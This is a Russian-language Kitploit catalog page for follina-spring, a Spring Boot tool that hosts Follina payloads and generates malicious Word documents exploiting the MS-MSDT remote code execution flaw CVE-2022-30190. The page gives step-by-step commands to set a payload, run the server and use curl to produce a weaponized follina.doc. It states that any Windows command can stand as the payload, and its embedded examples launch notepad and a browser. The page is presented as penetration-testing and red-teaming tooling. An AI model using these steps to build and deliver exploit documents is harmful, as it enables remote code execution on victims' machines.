Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
follina-spring — Сервер для размещения/активации полезных нагрузок Follina и генератор вредоносных документов Word, эксплуатирующих протокол MS-MSDT. (CVE-2022-30190) | Kitploit
Инструменты/GitHubGitHub/dsibilio/follina-spring
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubdsibilio/follina-spring

follina-spring

Сервер для размещения/активации полезных нагрузок Follina и генератор вредоносных документов Word, эксплуатирующих протокол MS-MSDT. (CVE-2022-30190)

Репозиторий
424 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Follina MS-MSDT эксплуатация с помощью Spring Boot

Этот репозиторий содержит простое Spring Boot приложение, которое одновременно выступает в роли сервера для размещения/активации полезных нагрузок Follina, а также в качестве генератора вредоносных документов Word, готовых к использованию в качестве векторов атаки для эксплуатации CVE-2022-30190.

Эта уязвимость заключается в удаленном выполнении кода через MSDT (Средство диагностики поддержки Microsoft Windows).

Серверная полезная нагрузка

Чтобы обслуживать уникальную полезную нагрузку по вашему выбору, вам следует:

  • определить полезную нагрузку, например:
root@kitploit:~
export FOLLINA_PAYLOAD="notepad.exe"
  • запустить сервер для размещения статической полезной нагрузки:
root@kitploit:~
mvn spring-boot:run
  • сгенерировать "Follina" документ Word:
root@kitploit:~
curl -s http://localhost:8080/generateDoc?address=http://192.168.64.128:8080 -o follina.doc

Если вы хотите изменить текущую полезную нагрузку, сначала необходимо остановить активный сервер, а затем повторить шаги после определения новой полезной нагрузки.

ПРИМЕЧАНИЕ: полезную нагрузку можно заменить любой другой командой, при условии, что ее можно выполнить через командную строку Windows.

Клиентская полезная нагрузка

Чтобы обслуживать полезную нагрузку на стороне клиента по вашему выбору, вам следует:

  • запустить сервер для активации полезных нагрузок во время выполнения:
root@kitploit:~
mvn spring-boot:run
  • сгенерировать "Follina" документ Word, указав параметр запроса cmd, например:
root@kitploit:~
curl -sG http://localhost:8080/generateDoc --data-urlencode 'address=http://192.168.64.128:8080' --data-urlencode 'cmd=start msedge.exe https://www.youtube.com/watch?v=zqTwOoElxBA' -o follina.doc

В данном случае полезная нагрузка встроена в документ, и ей потребуется лишь активация путем обращения к серверу. Таким образом, вы можете иметь несколько различных полезных нагрузок, распределенных по разным документам, и вам не придется перезагружать сервер для изменения полезных нагрузок — достаточно просто сгенерировать новый документ с нужной встроенной полезной нагрузкой.

Благодарности

Большое спасибо John Hammond за разработку реализации на Python и за то, что поделился своим анализом CVE.

Скачать инструмент